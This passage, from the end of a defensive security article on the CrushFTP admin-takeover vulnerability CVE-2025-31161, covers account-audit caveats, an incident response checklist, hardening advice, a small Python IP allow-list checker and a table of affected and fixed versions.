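    cutoff = datetime(2025, 5, 1, tzinfo=timezone.utc)
    for finding in audit_user_xml(record, {"ops-admin"}, cutoff):
        print(finding)
```

An attacker who can create accounts can also choose the `created_by_username` and `created_time` values, so an empty result does not prove the account list is clean. Compare against a known-good user list as well.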

Incident response checklist

  • Isolate the affected host from general network access.
  • Collect and preserve server logs, configuration files, and any related artifacts.
  • Search logs for unexpected account creations and access to /WebInterface/function/.
  • Rotate all administrative credentials and any service credentials stored on the host.
  • Rebuild compromised hosts from known-good images when compromise is confirmed.
  • Notify stakeholders and follow applicable breach notification policies if sensitive data exposure is suspected.

Long-term hardening recommendations

  • Keep CrushFTP and all server software up to date with vendor patches.
  • Limit exposure of administrative interfaces by placing them behind VPNs or management networks and by implementing IP allow lists.
  • Enforce strong authentication (MFA) for administrative accounts where supported.
  • Implement least privilege for service accounts and users; periodic reviews of admin accounts help detect unauthorized additions.
  • Enable comprehensive logging and centralized log aggregation so patterns and anomalies can be detected early.
  • Deploy runtime monitoring and EDR on hosts with admin interfaces to detect abnormal process or configuration changes.
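
The IP allow-list recommendation above is normally enforced in a firewall or reverse proxy, but the matching logic is simple enough to sketch for use in log review or a custom gateway. The example below uses Python's standard `ipaddress` module; the network ranges are placeholder documentation values, and the function names are illustrative.

```python
import ipaddress


def build_allow_list(cidrs):
    """Parse CIDR strings into network objects (host bits are tolerated)."""
    return [ipaddress.ip_network(c, strict=False) for c in cidrs]


def is_allowed(client_ip, allow_list):
    """True if the client address falls inside any allowed network."""
    addr = ipaddress.ip_address(client_ip)
    return any(addr in net for net in allow_list)


if __name__ == "__main__":
    # Placeholder management networks; replace with your own ranges.
    allow = build_allow_list(["10.20.0.0/16", "192.0.2.10/32"])
    for ip in ("10.20.5.9", "203.0.113.5"):
        print(ip, "allowed" if is_allowed(ip, allow) else "denied")
```

Applied to access logs, the same check highlights management-endpoint requests that arrived from outside the expected networks.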

Reference summary

Item        Details
CVE         CVE-2025-31161
Affected    CrushFTP versions < 10.8.4 and < 11.3.1
Impact      Remote unauthenticated admin takeover (account creation, config changes)
Mitigation  Upgrade to vendor-fixed releases (10.8.4, 11.3.1 or later). Block public access to WebInterface until patched.

Final notes

This article focuses on defensive analysis, detection and remediation. If you are responsible for a CrushFTP deployment, prioritize patching and blocking access to management endpoints. If you suspect compromise, follow the incident response checklist and engage your internal security team or an external incident response provider for containment and forensic analysis.